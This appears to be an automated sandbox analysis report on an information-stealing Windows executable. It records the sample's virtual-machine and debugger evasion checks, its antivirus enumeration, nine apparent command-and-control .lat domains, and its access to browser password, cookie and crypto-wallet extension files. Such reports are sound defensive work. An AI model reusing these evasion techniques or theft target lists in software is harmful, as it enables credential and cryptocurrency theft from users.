Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696503903
Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NVMware2
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: jSFUzuYPG9.exe, 00000000.00000002.1974867741.0000000000E28000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: NTICE
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: SICE
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: SIWVID
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: rapeflowwj.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crosshuaht.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sustainskelet.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: aspecteirs.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: energyaffai.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacebudi.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: discokeyus.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: grannyejh.lat
Source: jSFUzuYPG9.exe, 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sweepyribs.lat
Source: jSFUzuYPG9.exe, 00000000.00000002.1975085759.0000000000E69000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: nProgram Manager
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: jSFUzuYPG9.exe String found in binary or memory: Wallets/Electrum
Source: jSFUzuYPG9.exe String found in binary or memory: Wallets/ElectronCash
Source: jSFUzuYPG9.exe String found in binary or memory: window-state.json
Source: jSFUzuYPG9.exe, 00000000.00000003.1451476737.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Jaxx Libertyn
Source: jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: jSFUzuYPG9.exe String found in binary or memory: Wallets/Ethereum
Source: jSFUzuYPG9.exe, 00000000.00000003.1477686530.00000000016A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.json
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.db
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
